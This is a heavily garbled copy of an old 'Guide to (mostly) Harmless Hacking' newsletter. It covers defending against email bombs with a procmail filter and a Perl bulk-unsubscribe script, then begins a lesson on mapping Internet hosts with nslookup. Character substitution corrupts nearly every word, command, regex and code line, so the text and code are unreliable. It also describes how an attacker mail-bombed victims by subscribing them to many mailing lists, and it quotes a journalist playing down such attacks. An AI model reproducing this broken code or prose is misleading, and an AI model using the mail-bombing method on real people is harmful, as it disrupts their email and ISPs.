1nternet Hosts #he 2read G#6HH on /racking How to Be a Hero in /om.uter 7ab FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF G0123 #4 !mostly$ H*5673SS H*/81"G Col& % "umber , How to .rotect yourself from email bombs FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF 3mail bombs +eo.le like angry =ohnny( *8* the `0namailer(a ha<e made the news lately by arranging for -M 6B or more of email ?? tens of thousands of messages ?? to flood e<ery day into his <ictimsb email accounts&

3mail bombing can be bad news for two reasons& 4ne( the <ictim canbt easily find any of their legitimate email in that giant garbage hea. of s.am& #wo( the flood of messages ties u. mail ser<ers and chews u. communications bandwidth& 4f course( those are the two main reasons that email bombers make their attacks: to mess u. .eo.lebs email andIor harm the 1S+s they target& #he email bomb is a common wea.on of war against 1nternet hosts controlled by s.ammers and con artists& 1t also is used by lusers with a grudge& "ews stories make it sound like email bombing <ictims are( ahem( s))) out of luck& But we arenbt& We know( because angry ?? the /hristmas email bomber ?? told the .ress that he had targeted the Ha..y Hacker listbs Su.reme /ommanderess( /arolyn 6einel& !Someone simultaneously attem.ted to email bomb the Ha..y Hacker list itself but no one has ste..ed forward to take credit for the attem.t$& But as you know from the fact that we got the Ha..y Hacker 2igest out after the attack( and by the fact that 1 ke.t answering my email( there are ways to beat the email bombers& "ow most of these are techni@ues for use by e'.erts only& But if you are( like most of us on this list( a newbie( you may be able to win .oints with your 1S+ by emailing its technical hel. .eo.le with some of the information within this guide& 6aybe then theybll forgi<e you if your shell log file gets to looking a little too e'citing 6y first line of defense is to use se<eral on?line ser<ices& #hat way( whene<er one account is getting hacked( bombed( etc&( 1 can =ust email all my corres.ondents and tell them where to reach me& "ow 1b<e ne<er gotten bombed into submission( but 1 ha<e gotten hacked badly and often enough that 1 once had to dum. an 1S+ in disgust& 4r( an 1S+ may get a little too an'ious o<er your hacking e'.eriments& So itbs a good idea to be .re.ared to =um. accounts& But thatbs a .retty chicken way to handle email bombing& Besides( a member of the Ha..y Hacker list says that the reason angry =ohnny didnbt email bomb all the accounts 1 most commonly use is because he .ersuaded =ohnny to =ust bomb one for .ublicity .ur.oses& But e<en if =ohnny had bombed all my fa<orite accounts( 1 could ha<e been back on my feet in a hurry&

#here are se<eral ways that either your 1S+ or you can defeat these attacks& #he sim.lest defense is for your 1S+ to block mail bombs at the router& #his only works( howe<er( if the attack is coming from one or a few hosts& 1t also only works if your 1S+ agrees to hel. you out& ;our 1S+ may =ust chicken out instead and close your account& ))))))))))))))))))))))))))) "ewbie note: routers are s.eciali>ed com.uters that direct traffic& * host is a com.uter on the 1nternet& ))))))))))))))))))))))))))) But what if the attack comes from many .laces on the 1nternet? #hat ha..ened to me on /hristmas day when angry =ohnny took credit for an email bombing attack that also hit a number of well?known 0S figures such as e<angelist Billy Graham( +resident Bill /linton and S.eaker of the 0S House of 5e.resentati<es "ewt Gingrich& !1 blush to find myself in such com.any&$ #he way angry =ohnny worked this attack was to set u. a .rogram that would go to one com.uter that runs a .rogram to handle email lists and automatically subscribe his targets to all lists handled by that com.uter& #hen his .rogram went to another com.uter that handles email lists and subscribed his targets to all the lists it handled( and so on& 1 was able to fi' my .roblem within a few minutes of disco<ery& =ohnny had subscribed all these lists to my address cmeinelJswc.&com& But 1 use my .ri<ate domain( techbroker&com( to recei<e email& #hen 1 .i.e all this from my nameser<er at Highway #echnologies to whate<er account 1 find useful at the time& So all 1 had to do was go to the Highway #echnologies Web site and configure my mail ser<er to .i.e email to another account& )))))))))))))))))))))))))) "ewbie note: a mail ser<er is a com.uter that handles email& 1t is the one to which you hook your .ersonal com.uter when you gi<e it a command to u.load or download your email& )))))))))))))))))))))))))) ))))))))))))))))))))))) 3<il genius ti.: ;ou can @uickly reroute email by creating a file in your shell account !you do ha<e a shell account( donbt you? SH377 *//40"# *ll

good hackers should ha<e a SH377 *//40"# $ named &forward& #his file directs your email to another email account of your choice& ))))))))))))))))))))))) 1f angry =ohnny had email bombed cmeinelJtechbroker&com( 1 would ha<e .i.ed all that crud to de<Inull and re@uested that my corres.ondents email to carolynJtechbroker&com( etc& 1tbs a .retty fle'ible way of handling things& *nd my swc.&com accounts work the same way& #hat 1S+( Southwest /yber.ort( offers each user se<eral accounts all for the same .rice( which is based on total usage& So 1 can create new email addresses as needed& Warning ?? this techni@ue ?? e<ery techni@ue we co<er here ?? will still cause you to lose some email& But 1 figure( why get obsessi<e o<er it? *ccording to a study by a ma=or .aging com.any( a significant .ercentage of email sim.ly disa..ears& "o mail daemon warning that the message failed( nothing& 1t =ust goes into a black hole& So if you are counting on getting e<ery .iece of email that .eo.le send you( dream on& But this doesnbt sol<e my 1S+bs .roblem& #hey still ha<e to deal with the bandwidth .roblem of all that crud flooding in& *nd itbs a lot of crud& 4ne of the sysadmins at Southwest /yber.ort told me that almost e<ery day some luser email bombs one of their customers& 1n fact( itbs ama>ing that angry =ohnny got as much .ublicity as he did( considering how common.lace email bombing is& So essentially e<ery 1S+ somehow has to handle the email bomb .roblem& How was angry =ohnny was able to get as much .ublicity as he did? ;ou can get an idea from this letter from 7ewis 8och( the =ournalist who broke the story !.rinted with his .ermission$: Hrom: 7ewis Q 8och ^l>kochJmcs&netV Sub=ect: Suestion /arolyn: Hirst( and .erha.s most im.ortant( when 1 called you to check if you had indeed been email bombed( you were courteous enough to res.ond with information& 1 think it is a tad .resum.tuous for you to state that :as a .rofessional courtesy 1 am FlettingF 7ewis 8och get the full scoo.&: #his was a story that was( in fact( e'clusi<e&

!/arolynbs note: as a <ictim 1 knew technical details about the attack that 8och didnbt know& But since 8och tells me he was in contact with angry =ohnny in the weeks leading u. to the mass email bombings of /hristmas ,99E( he clearly knew a great deal more than 1 about the list of =ohnnybs targets& 1 also am a =ournalist( but deferred to 8och by not trying to beat him to the scoo.&$ Second( yes 1 am a subscriber and 1 am interested in the ideas you ad<ance& But that interest does not e'tend to feeding you ?? or single indi<idual or grou. ?? ::lots of =uicy details&: #he details of any story lay in the writing and commentary 1 offer the .ublic& :Ruicy: is another word for sensationalism( a tabloid a..roach ?? and something 1 carefully a<oid& !/arolynbs note: 1f you wish to see what 8och wrote on angry =ohnny( you may see it in the Ha..y Hacker 2igest of 2ec& -D( ,99E&$ #he fact is 1 am e'traordinarily sur.rised by some of the reactions 1 ha<e recei<ed from indi<iduals( some of whom were targets( others who are bystanders& #he whole .oint is that there are e'traordinary <ulnerabilities to and on the "et ?? <ulnerabilities which are being ignored&&&at the .eril of us all& /ontinuing: :Howe<er( bottom line is that the email bomber used a techni@ue that is ridiculously lame ?? so lame that e<en /arolyn 6einel could turn off the attack in mere minutes& Hry in de<Inull( email bomber : =ohnny made the .oint se<eral times that the attack was :sim.le&: 1t was deliberately designed to be sim.le& 1 imagine ?? 1 know ?? that if he( or other hackers had chosen to do damage( serious( real damage( they could easily do so& #hey chose not to& 4ne .erson who was attacked and was angry with my re.ort& He used language such as :his cam.aign of terror(: :the twisted mind of '=ohnny'(: :.sychos like '=ohnny'(: :some microence.halic moron(: :a .etty gangster: to describe =ohnny& #his kind of thinking ignores history and reality& 1f one wants to use a term such as :cam.aign of terror: they should check into the history of the 0nabomber( or the grou. that bombed the #rade /enter( or the Hederal

Building in 4klahoma /ity&&&or look to what has ha..ened in 1reland or 1srael& #here one finds :terrorism&: What ha..ened was an incon<enience ??e@ui<alent( in my estimation( to the same kind of incon<enience .eo.le e'.erienced when young .eo.le blocked the streets of ma=or cities in .rotest against the war in Cietnam& +eo.le were incon<enienced ??? but the .rotesters were making a .oint about an illegal and unnecessary war that e<en the .rosecutors of the war( like 5obert 6c"amara knew from the beginning was a lost <enture& Hundreds of thousands of .eo.le lost their li<es in that war ?? and if some .eo.le found themsel<es incon<enienced by .eo.le .rotesting against it ?? 1 say( too d))) bad& #hank you for forwarding my remarks to your list *hem& 1bm flattered( 1 guess& 1s 8och suggesting the Ha..y Hacker list ?? with its habit of )))ing out naughty words ?? and e<angelist Billy Graham ?? whose faith 1 share ?? are of an 3arth?shaking le<el of .olitical bad newsness com.arable to the Cietnam War? So letbs say you donbt feel that it is 48 for any two?bit hacker wannabe to kee. you from recei<ing email& what are some more ways to fight email bombs? Hor bombings using email lists( one a..roach is to run a .rogram that sorts through the initial flood of the email bomb for those `Welcome to the #omato #waddler 7ist a messages which tell how to unsubscribe& #hese .rograms then automatically com.ose unsubscribe messages and send them out& *nother way your 1S+ can hel. you is to .ro<ide a .rogram called +rocmail !which runs on the 0ni' o.erating system& Hor details( Qach Babayco !>achbJnetcom&com$ has .ro<ided the following article& #hank you( Qach ))))))))))))))))))))))))))))))) 2efending *gainst 3mail?Bombing and 0nwanted 6ail /o.yright !/$ Qach Babayco( ,99E YBefore 1 start this article( 1 would like to thank "ancy 6cGough for letting me @uote liberally from her Hiltering 6ail H*S( a<ailable at htt.:IIwww&cis&ohio?state&eduIhy.erte'tIfa@IusenetImailIfiltering?fa@Ifa@&html&

#his is one of the best filtering?mail H*Ss out there( and if you ha<e any .roblems with my directions or want to learn more about filtering mail( this is where you should look&Z 7ately( there are more and more .eo.le out there sending you email that you =ust don't want( like :6ake 6oney Hast : garbage or lame e>ines that you ne<er re@uested or wanted in the first .lace& Worse( there is the email bomb& #here are two ty.es of email bombs( the 6assmail and the 6ailing 7ist bomb: ,$ 6assmail?bombing& #his is when an attacker sends you hundreds( or .erha.s e<en thousands of .ieces of email( usually by means of a scri.t and fakemail& 4f the two ty.es( this is the easier to defend against( since the messages will be coming from =ust a few addresses at the most& -$ 6ailing 7ist bombs& 1n this case( the attacker will subscribe you to as many mailing lists as he or she can& #his is much worse than a massmail because you will be getting email from many different mailing lists( and will ha<e to sa<e some of it so that you can figure out how to unsubscribe from each list& #his is where +rocmail comes in& +rocmail !.ronounced .rok?mail$ is a email filtering .rogram that can do some <ery neat things with your mail( like for e'am.le( if you subscribe to se<eral high?<olume mailing lists( it can be set u. to sort the mail into different folders so that all the messages aren't all mi'ed u. in your 1nbo'& +rocmail can also be configured to delete email from certain .eo.le and addresses& Setting u. +rocmail ??????????????????? Hirst( you need to see if your system has +rocmail installed& Hrom the .rom.t( ty.e: V which .rocmail 1f your system has +rocmail installed( this command will tell you where +rocmail is located& Write this down ? you will need it later&

)"4#3) 1f your system gi<es you a res.onse like :0nknown command: which: then try substituting 'which' with 'ty.e'( 'where'( or 'whereis'& 1f you still cannot find +rocmail( then it is .robably a good bet that your system does not ha<e it installed& Howe<er( you're not com.letely out of luck ? look at the H*S 1 mentioned at the beginning of this file and see if your system has any of the .rograms that it talks about& "e't( you ha<e to set u. a resource file for +rocmail& Hor the rest of this document( 1 will use the editor +ico& ;ou may use whiche<er editor you feel comfortable with& 6ake sure that you are in your home directory( and then start u. your editor& V cd V .ico &.rocmailrc 3nter the following in the &.rocmailrc file: 9 #his line tells +rocmail what to .ut in its log file& Set it to on when 9 you are debugging& C35B4S3Woff 9 5e.lace 'mail' with your mail directory& 6*17215WOH463Imail 9 #his is where the logfile and rc files will be ke.t +6215WOH463I&.rocmail 74GH173WO+6215Ilog 9 1"/70235/WO+6215Irc&ebomb !yes( ty.e the 1"/70235/ line W1#H the 9$ "ow that you'<e ty.ed this in( sa<e it and go back u. to your home directory& V cd V mkdir &.rocmail "ow go into the directory that you =ust made( and start your editor u. with a new file: rc&ebomb:

16+45#*"#: Be sure that you turn off your editor's word wra..ing during this .art& ;ou will need to ha<e the second( third( and fourth lines of this ne't e'am.le all on one line& With +ico( use the ?w flag& /onsult your editor's manual .age for instructions on turning off its word wra..ing& 6ake sure that when you edit it( you lea<e "4 S+*/3S in that line& V cd &.rocmail V .ico ?w rc&noebomb 9 noebomb ? email bomb blocker :M ) B!!!!5esent?$?!Hrom_Sender$_U?3n<elo.e?Hrom$:_Hrom $!&)YB&PJa?>M?9Z$? !+ost!ma?!st!e?r$?_n$_office$_6ail!er$?_daemon_mmdf_root_uuc._71S#S35C_ owner _re@uest_bounce_ser<!ices?_er$$!YB& :a?>M?9Z_O$$$ ) BHrom:&)!.ostmaster_6ailer_list.roc_ma=ordomo_listser<_cmeinel_=ohnb$ ) B#4!netstuff_com.uting_.cgames$ Ide<Inull 7ets see what these do& #he first line tells +rocmail that this is the beginning of a :reci.e: file& * reci.e it basically what it sounds like ?? it tells the .rogram what it should look for in each email message( and if it finds what it is looking for( it .erforms an action on the message ? forwarding it to someoneA .utting it in a certain folderA or in this case( deleting it& #he second( third( and fourth lines !the ones beginning with a )$are called /4"21#14"S& #he asterisk !)$ tells +rocmail that this is the beginning of a condition& #he tells it to do the 4++4S1#3 of what it would normally do& /ondition ,: ) B!!!!5esent?$?!Hrom_Sender$_U?3n<elo.e?Hrom$:_Hrom $!&)YB&PJa?>M?9Z$? !+ost!ma?!st!e?r$?_n$_office$_6ail!er$?_daemon_mmdf_root_uuc._71S#S35C_ owner _re@uest_bounce_ser<!ices?_er$$!YB& :a?>M?9Z_O$$$ 2on't freak out o<er this( it is sim.ler than it seems at first glance& #his condition tells +rocmail to look at the header of a message( and see if it is from one of the administrati<e addresses like root or .ostmaster( and also

check to see if it is from a mailer?daemon !the thing that sends you mail when you bounce a message$& 1f a message 1S from one of those addresses( the reci.e will .ut the message into your inbo' and not delete it& *d<anced 0ser "ote: #hose of you who are familiar with +rocmail are .robably wondering why 1 re@uire the user to ty.e in that whole long line of commands( instead of using the H546F6*1735 command& Well( it looked like a good idea at first( but 1 =ust found out a few days ago that H546F6*1735 also checks the +recedence: header for the words =unk( bulk( and list& 6any !if not all$ mailing?list ser<ers ha<e either +recedence: bulk or +recedence: list( so if someone subscribes you to se<eral hundred lists( H546F6*1735 would let most of the messages through( which is "4# what we want& /ondition -: ) BHrom:&)!list.roc_ma=ordomo_cmeinel_=ohnb$ #his condition does some more checking of the Hrom: line in the header& 1n this e'am.le( it checks for the words list.roc( ma=ordomo( cmeinel( and =ohnb& 1f it is from any of those .eo.le( it gets .assed on to your 1nbo'& 1f not( it's a goner& #his is where you would .ut the usernames of .eo.le who normally email you( and also the usernames of mailing?list ser<ers( such as list.roc and ma=ordomo& When editing this line( remember to: only .ut the username in the condition( not a .ersons full email address( and remember to .ut a _ between each name& /ondition %: ) B#4!netnews_cry.to?stuff_.cgames$ #his final condition is where you would .ut the usernames of the mailing lists that you are subscribed to !if any$& Hor e'am.le( 1 am subscribed to the netnews( cry.to?stuff( and .cgames lists& When you get a message from most mailing lists( most of the time the list address will be in the #o: or /c: .art of the header( rather than the Hrom: .art& #his line will check for those usernames and .ass them through to your 1nbo' if they match& 3diting instructions are the same as the ones for /ondition -&

#he final line( Ide<Inull( is essentially the trash can of your system& 1f a .iece of email does not match any of the conditions( !i&e& it isn't from a mail administrator( it isn't from a listser<er or someone you write to( and it's not a message from one of your usual mailing lists$ +rocmail dum.s the message into Ide<Inull( ne<er to be seen again& 4k& "ow you should ha<e created two files: &.rocmailrc and rc&noebomb& We need one more before e<erything will work .ro.erly& Sa<e rc&noebomb and e'it your editor( and go to your home directory& 4nce there( start your editor u. with the no word wra..ing command& V cd V .ico ?w &forward We now go to an e'cer.t from "ancy 6&'s 6ail Hiltering H*S: 3nter a modified <ersion of the following in your ]I&forward: :_1HSW' ' NN e'ec IusrIlocalIbinI.rocmail ?f? __ e'it K5 9nancym: WW 16+45#*"# "4#3S WW ) 6ake sure you include all the @uotes( both double !:$ and single !'$& ) #he <ertical bar !_$ is a .i.e& ) 5e.lace IusrIlocalIbin with the correct .ath for .rocmail !see ste. ,$& ) 5e.lace enancym' with your userid& ;ou need to .ut our userid in your &forward so that it will be different than anyother &forward ile on your system& ) 2o "4# use ] or en<ironment <ariables( like OH463( in your &forward file& 1f .rocmail resides below your home directory write out the )full) .ath& 4n many systems you need to make your &forward world readable and your home directory world searchable in order for the mail trans.ort agent to :see: it& #o do this ty.e: cd chmod EGG &forward chmod aX' & 1f the &forward tem.late abo<e doesn't work the following alternati<es might be hel.ful: 1n a .erfect world:

:_e'ec IusrIlocalIbinI.rocmail 9nancym: 1n an almost .erfect world: :_e'ec IusrIlocalIbinI.rocmail 0S35Wnancym: 1n another world: :_1HSW' 'Ae'ec IusrIlocalIbinI.rocmail 9nancym: 1n a different world: :_1HSW' 'Ae'ec IusrIlocalIbinI.rocmail 0S35Wnancym: 1n a smrsh world: :_IusrIlocalIbinI.rocmail 9nancym: "ow that you ha<e all the necessary files made( it's time to test this filter& Go into your mailreader and create a new folder called 3bombtest& #his .rocedure differs from .rogram to .rogram( so you may ha<e to e'.eriment a little& #hen o.en u. the rc&noebomb file and change Ide<Inull to 3bombtest& !;ou should ha<e already changed /onditions - and % to what you wantA if not( go do it now $ Hinally( o.en u. &.rocmailrc and remo<e the 9 from the last line& ;ou will need to lea<e this on for a bit to test it& *sk some of the .eo.le in /ondition - to send you some test messages& 1f the messages make it through to your 1nbo'( then that condition is working fine& Send yourself some fake email under a different name and check to see if it ends u. in the 3bombtest folder& *lso( send yourself some fakemail from rootJwhere<er&com to make sure that /ondition , works& 1f you're on any mailing lists( those messages should be ending u. in your 1nbo' as well& 1f all of these test out fine( then congratulations ;ou now ha<e a working defense against email bombs& Hor the moment( change the 3bombtest line in the rc&noebomb file back to Ide<Inull( and .ut the 9 in front of the 1"/70235/ line in the &.rocmailrc file& 1f someone e<er decides to emailbomb you( you only need to remo<e the 9( and you will ha<e greatly cut down on the amount of messages coming into your 1nbo'( gi<ing you a little bit of breathing room to start unsubscribing to all those lists( or start tracking down those idiots who did it and get their asses kicked off their 1S+'s& 1f you ha<e any comments or @uestions about this( email me at >achbJnetcom&com& 3mailbombs W177 go to Ide<Inull( so don't bother

2isclaimer: When you acti<ate this .rogram( it is ine<itable that a small amount of wanted mail 6*; get .ut into Ide<Inull( due to the fact that it is nearly im.ossible to know the names of all the .eo.le that may write to you& #herefore( 1 assume no res.onsibility for any email which may get lost( and any damages which may come from those lost messages& )))))))))))))))))))) 2onbt ha<e .rocmail? 1f you ha<e a 0ni' bo'( you can download .rocmail from ft.:IIft.&informatik&rwth?aachen&deI.ubI.ackagesI.rocmailI ))))))))))))))))))) * note of thanks goes to 2amien Sorder !=erichoJdimensional&com$ for his assistance in re<iewing this guide& *nd now( =ust to make certain you can get this in<aluable +erl scri.t to automatically unsubscribe email lists( here is the listing: 9 IusrIlocalIbinI.erl 9 unsubscribe 9 9 * .erl scri.t by 8im Holburn( 0ni<ersity of /anberra ,99E& 9 kimJcanberra&edu&au 9 Heel free to use this and ad=ust it& 1f you make any useful ad=ustments or 9 additions send them back to me& 9 9 #his scri.t will unsubscribe users in bulk from whate<er mail lists they are 9 subscribed to& 1t also mails them that it has done this& 9 1t is useful for sys admins of large systems with many accounts and 9 floating .o.ulations( like student ser<ers& 9 #his scri.t must be run by root although 1 don't check for this& 9 ;ou ha<e to be root to read someone else's mailbo' and to 9 su to their account( both of which this scri.t need to do& 9 9 #his scri.t when a..lied to a mailbo' will look through it to find 9 any emails sent by mailing lists( attem.t to determine the address of the 9 mailing list and then send an unsubscribe message from that user& 9 1f in<oked with no o.tions only the mailbo' name!s$ it will assume 9 the mailbo' filename is the same as the username( as it is on a sun& 9 9 #echnical details: 9 #o find emails from mailing lists it looks for :owner: as .art of

9 the originating email address in the BS2 Hrom line !en<elo.e$& 9 list ser<ers that don't do this will be missed if you can figure a way 9 round this let me know& 9 #he scri.t doesn't do any file locking but then it only reads the mailbo' 9 file& sub failFusage [ if !JF ne ''$ [ .rint :3rror : :( JF( :Tn:A \ .rint :0sage : OM Y?dZ mailbo'esTn:A .rint :0sage : OM Y?dZ ?u user mailbo'Tn:A .rint :0sage : OM Y?dZ ?u user ?l listname ?h host ?a listser<erTn:A .rint :where listser<er is the full email address of the listser<erTn:A e'itA \ sub unsub [ local !Omyuser( Omylist( Omyhost( Omyaddress$ W JFA if ! Odebug$ [ if ! o.en !S3"2( :_!0S35WOmyuserA74G"*63WOmyuserAsu Omyuser ?c T:IusrIucbImail OmyaddressT:$:$$ [ .rint :/ouldn't o.en mailer for user T:OmyuserT:Tn:A ne'tA \ .rint S3"2 :unsubscribe OmylistTn: A close S3"2A \ else [ .rint :"o unsub T:OmyuserT: on T:OmylistJOmyhostT: to :Tn:A .rint : OmyaddressTn:A \ \ sub notify [ local!Omyuser( Omylist( Omyhost( Omyaddress$ W JFA if ! Odebug$ [ if ! o.en !S3"2( :_IusrIucbImail ?s T:unsubscribed OmylistT: Omyuser:$$ [ .rint :/ouldn't o.en mailer for user T:OmyuserT:Tn:A ne'tA \ Omess W ^^346A ;ou ha<e been automatically unsubscribed from the mailing list : OmylistJOmyhost to resubscribe follow the original directions or 346

.rint S3"2 OmessA if !Omyaddress ] I(I$ [ .rint S3"2 :send a message to the address Omyaddress Tn: A \ else [ .rint S3"2 :send a message to the a..ro.riate one of the addresses:Tn:A .rint S3"2 :Omyaddress Tn: A \ OmessG W ^^346-A with no sub=ect( no signature and a single line : subscribe !your name$ 346.rint S3"2 OmessG A close S3"2A \ else [ .rint :"o notify T:OmyuserT: on T:OmylistJOmyhostT: to :Tn:A .rint : OmyaddressTn:A \ \ OdebugWMA Ousersu..liedWMA while !!O9*5GC V !?,$$ NN !O*5GCYMZ W] IB?I$$ [ if !O*5GCYMZ e@ '?d'$ [ shift *5GCA OdebugW,A \ elsif !O9*5GC ^ ,$ [ NfailFusage!:o.tion T:O*5GCYMZT: needs an argument:$A \ elsif !O*5GCYMZ e@ '?u'$ [ shift *5GCA OuserWshift *5GCA \ elsif !O*5GCYMZ e@ '?l'$ [ shift *5GCA OlistWshift *5GCA \ elsif !O*5GCYMZ e@ '?h'$ [ shift *5GCA OhostWshift *5GCA \ elsif !O*5GCYMZ e@ '?a'$ [ shift *5GCA OaddressWshift *5GCA \ else [ NfailFusage!$A \ \ Ousersu..lied W !Ouser ne ''$ A 9.rint :debug dWT:OdebugT: uWT:OuserT: lWT:OlistT: hWT:OhostT:Tn:A 9.rint :debug TO9*5GCWO9*5GC aWT:OaddressT: Tn:A if !O9*5GC WW !?,$$ [ if !Ousersu..lied NN Olist ne '' NN Ohost ne '' NN Oaddress ne '' NN O9*5GC$ [ Olist W] sIJ&)OIIA Ouser W] sIJ&)OIIA

Ohost W] sIB&)JIIA if !Oaddress ] IJI$ [ NfailFusage!:bad address:$A \ Nunsub !Ouser( Olist( Ohost( Oaddress$A Nnotify !Ouser( Olist( Ohost( Oaddress$A e'itA \ else [ NfailFusage!:no files and no addresses:$A \ \ if !Ousersu..lied NN O9*5GC V M$ [ NfailFusage!$A \ foreach Ofile !J*5GC$ [ PaddressesW!$A if ! Ousersu..lied$ [ OuserWOfileA \ Ouser W] sJB&)IJJA if !Ofile W] IBT&I$ [ .rint :ski..ing wrong ty.e of file T:OfileT:Tn:A ne'tA \ if !Ofile W] IT&lockI$ [ .rint :ski..ing lock file T:OfileT:Tn:A ne'tA \ if !Ofile W] IT&I$ [ .rint :ski..ing wrong ty.e of file T:OfileT:Tn:A ne'tA \ Ouser W] sIBT&IIA Ouser W] sIT&&)OIIA if ! o.en !6;H173( :^Ofile: $$ [ .rint :/ouldn't o.en file T:OfileT:Tn:A ne'tA \ .rint :??????????????????????????o.ening file T:OfileT:Tn:A while !^6;H173V$ [ 9 if !I!Tbnews?Y?Tw&ZXJ$_!Y?Tw&ZX?newsJ$Ii$ 9 if !I!Tbre@uest?Y?Tw&ZXJ$_!Y?Tw&ZX?re@uestJ$Ii$ if !I!Tbowner?Y?Tw&ZXJ$_!Y?Tw&ZX?ownerJ$Ii$ [ cho.A trI*?QIa?>IA if !ITbowner?Y?Tw&ZXJI$ [ sIB&)Tbowner?!Y?Tw&ZXJYTw&ZX$Tb&)OIT,IA \ else [ sI!B_B&)YB?Tw&Z$!Y?Tw&ZX$?owner!JYTw&ZX$Tb&)OIT-T%IA \ if !IYBa?>M?9J&?ZI$ [ ne'tA \ if ! defined !Oaddresses[OF\$$ [ Oaddresses[OF\W::A \ \ if !I!Tbl?Y?Tw&ZXJ$_!Y?Tw&ZX?lJ$Ii$ [ cho.A trI*?QIa?>IA if !ITbl?Y?Tw&ZXJI$ [ sIB&)Tbl?!Y?Tw&ZXJYTw&ZX$Tb&)OIT,IA \ else [ sI!B_B&)YB?Tw&Z$!Y?Tw&ZX$?l!JYTw&ZX$Tb&)OIT-T%IA \ if !IYBa?>M?9J&?ZI$ [ ne'tA \ if ! defined !Oaddresses[OF\$$ [ Oaddresses[OF\W::A \

\ \ close 6;H173A while !!Okey(O<alue$Weach Paddresses$ [ .rint :OkeyTn:A \ if ! keys Paddresses $ [ .rint :no listser<ersTn:A ne'tA \ if ! o.en !6;H173( :^Ofile: $$ [ .rint :/ouldn't o.en file T:OfileT:Tn:A ne'tA \ .rint :looking for listser<er addressesTn:A while !^6;H173V$ [ foreach Oaddress !keys Paddresses$ [ OhostWOaddressA Ohost W] sIB&)JIIA if !I!listser<_list.roc_ma=ordomo$JOhostIi$ [ Oaddresses[Oaddress\WO,A 9 .rint :found , W T:O,T:Tn:A \ \ \ close 6;H173A while !!Okey(O<alue$Weach Paddresses$ [ OhostWOkeyA OhostW]sIB&)JIIA OlistWOkeyA OlistW]sIJ&)OIIA 9 .rint :O<alueJOhost keyWT:OkeyT: listWT:OlistT: Tn:A if !O<alue e@ ''$ [ OaddressW:listser<JOhost(list.rocJOhost(ma=ordomoJOhost:A \ else [ OaddressW:O<alueJOhost:A \ .rint :addressWT:OaddressT:Tn:A .rint :unsubscribe OlistTn:A if ! Odebug$ [ .rint :6ailing OuserTn:A Nunsub !Ouser( Olist( Ohost( Oaddress$A Nnotify !Ouser( Olist( Ohost( Oaddress$A \ else [ .rint :debug no mailTn:A \ \ \

FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF G0123 #4 !mostly$ H*5673SS H*/81"G Col& % "umber How to ma. the 1nternet& 2ig Whois "slooku. #raceroute "etstat .ort is getting hard to use anymore( howe<er&&& FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF Why ma. the 1nternet? ) Because itbs fun ?? like e'.loring unknown continents& #he 1nternet is so huge( and it changes so fast( no one has a com.lete ma.& ) Because when you canbt make contact with someone in a distant .lace( you can hel. your 1S+ trouble shoot broken links in the 1nternet& ;es( 1 did that once that when email failed to a friend in "orthern 1reland& How will your 1S+ know that their communications .ro<ider is lying down on the =ob unless someone ad<ises them of trouble? ) Because if you want to be a com.uter criminal( your ma. of the connections to your intended <ictim gi<es you <aluable information& "ow since this is a lesson on )legal) hacking( webre not going to hel. you out with how to determine the best bo' in which to install a sniffer or how to tell what 1+ address to s.oof to get .ast a .acket filter& Webre =ust going to e'.lore some of the best tools a<ailable for ma..ing the uncharted realms of the 1nternet& Hor this lesson( you can get some benefit e<en if all you ha<e is Windows& But to take full ad<antage of this lesson( you should either ha<e some sort of 0ni' on your .ersonal com.uter( or a shell account SH377 *//40"# 1f you donbt ha<e one( you may find an 1S+ that will gi<e you a shell account at htt.:IIwww&celestin&comI.ociaI& )))))))))))))))))))))))))))) "ewbie note: * shell account is an account with your 1S+ that allows you to gi<e commands on a com.uter running 0ni'& #he `shella is the .rogram that translates your keystrokes into 0ni' commands& #rust me( if you are a

beginner( you will find bash !for Bourne again shell$ to be easiest to use& *sk tech su..ort at your 1S+ for a shell account set u. to use bash& 4r( you may be able to get the bash shell by sim.ly ty.ing the word `basha at the .rom.t& 1f your 1S+ doesnbt offer shell accounts( get a new 1S+ that does offer it& * great book on using the bash shell is F7earning the Bash ShellF( by /ameron "ewham and Bill 5osenblatt( .ublished by 4b5eilly& )))))))))))))))))))))))))))) So for our ma..ing e'.edition( letbs start by <isiting the 1nternet in Botswana Wow( is Botswana e<en on the 1nternet? 1tbs a lo<ely landlocked nation in the southern region of *frica( famous for cattle ranching( diamonds and abundant wildlife& #he language of commerce in Botswana is 3nglish( so therebs a good chance that we could understand messages from their com.uters& 4ur first ste. in learning about Botswanabs 1nternet hosts is to use the 0ni' .rogram nslooku.& )))))))))))))))))))))))))))) 3<il genius ti.: "slooku. is one of the most .owerful 1nternet ma..ing tools in e'istence& We can hardly do it =ustice here& 1f you want to learn how to e'.lore to the ma'( get the book F2"S and B1"2F by +aul *lbit> and /ricket 7iu( .ublished by 4b5eilly( ,99K edition& ))))))))))))))))))))))))))) #he first ste. may be to find where your 1S+ has hidden the .rogram by using the command `whereis nslooku.&a !4r your com.uter may use the `finda command&$ *ha ?? there it is 1 gi<e the command: ?VIusrIetcInslooku. 2efault Ser<er: swc.&com *ddress: ,9D&59&,,5&V #hese two lines and the slightly different .rom.t !it isnbt an arrow any more$ tell me that my local 1S+ is running this .rogram for me& !1t is .ossible to run nslooku. on another com.uter from yours&$ "ow we are in the .rogram( so 1 ha<e to remember that my bash commands donbt work any more& 4ur ne't ste. is to tell the .rogram that we would like to know what com.uters handle any gi<en domain name& V set ty.eWns

